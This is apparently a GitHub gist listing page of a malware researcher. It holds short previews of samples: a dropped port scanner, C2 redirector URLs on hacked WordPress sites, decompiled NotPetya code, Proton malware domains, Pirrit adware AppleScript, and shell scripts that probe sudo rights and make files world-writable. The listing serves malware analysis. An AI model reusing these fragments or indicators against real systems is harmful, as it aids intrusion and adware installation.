
Amit Serper aserper

View gist:e36d382668c6cf2c996c5143025097c0
AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
aserper / dropped_port_scanner.py
Created Jun 13, 2019
Dropped Python port scanner
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
from random import randrange
import random
aserper / gist:cbcd0c8ecbda9398911ecaa1c7f2f71b
Created Mar 8, 2019
Hacked WordPress domains used as C2 redirectors
http://printofcenter.pl/media/system/info.php?url=
http://printofcenter.pl/media/system/log.php?url=
http://moippo.org.ua/media/system/log.php?url=
http://moippo.org.ua/media/system/info.php?url=
http://nihir.org/wp-includes/rest-api/info.php?url=
http://nihir.org/wp-includes/rest-api/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/info.php?url=
http://asoftel.east.3cx.us/wp-includes/js/log.php?url=
http://asoftel.east.3cx.us/wp-includes/js/info.php?url=
aserper / gist:d0f1f2eb66b582ca04f195707a8d0126
Created Jul 2, 2017
Form1 from Karo. NotPetya svchost.exe
using ;
using ;
using ;
using ;
using ;
using IWshRuntimeLibrary;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;
using System;
using System.Collections.Generic;
aserper / gist:43664a1daf7d309c46edc2f739d78ecd
Created May 9, 2017
domains from proton.b encrypted file
handbrakestore.com
handbrake.cc
luwenxdsnhgfxckcjgxvtugj.com
6gmvshjdfpfbeqktpsde5xav.com
kjfnbfhu7ndudgzhxpwnnqkc.com
yaxw8dsbttpwrwlq3h6uc9eq.com
qrtfvfysk4bdcwwwe9pxmqe9.com
fyamakgtrrjt9vrwhmc76v38.com
kcdjzquvhsua6hlfbmjzkzsb.com
ypu4vwlenkpt29f95etrqllq.com
View gist:573dcf3323b32d7ac701c3e9d6417596
61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
View pirrit_applescript
-- Top-level run of the script: declares a global named _pid, stores a literal
-- placeholder string in it, then loops with no exit condition, invoking the
-- handler declared below for the raw event code «event XFdrIjct» on every pass.
-- NOTE(review): "pid_value_to_replace" reads like a template token that is
-- substituted before the script is used; the visible lines do not show that
-- step, so confirm against the full sample.
global _pid
set _pid to "pid_value_to_replace"
-- No exit test in this loop; the only pacing visible is the `delay 0.5` that
-- opens the handler body (the rest of the handler is outside this preview).
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5
View setup.sh
#!/bin/bash
chmod +x install_updater.sh
./install_updater.sh $6
#save current dir position
curdir=`pwd`
user=`users | cut -f1 -d' '`
#if somebody disturbs /tmp using
View gist:c71765d5efe4bc26387573f4ce9f47f2
#!/bin/sh
function offer7000 {
whoami > /var/tmp/whoami.txt
sudo whoami > /var/tmp/suwho.txt
updFile="/var/tmp/updText.txt"
touch $updFile
sudo chmod 777 $updFile
sudo whoami >> $updFile
aserper / gist:f7961e63a89c2c0a71149544d55ee39f
Created Apr 9, 2016
OS X Pirrit new configuration AppleScript - DON'T RUN IT
-- Top-level run of the script: declares a global named _pid, stores a literal
-- placeholder string in it, then loops with no exit condition, invoking the
-- handler declared below for the raw event code «event XFdrIjct» on every pass.
-- NOTE(review): "pid_value_to_replace" reads like a template token that is
-- substituted before the script is used; the visible lines do not show that
-- step, so confirm against the full sample.
global _pid
set _pid to "pid_value_to_replace"
-- No exit test in this loop; the only pacing visible is the `delay 0.5` that
-- opens the handler body (the rest of the handler is outside this preview).
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5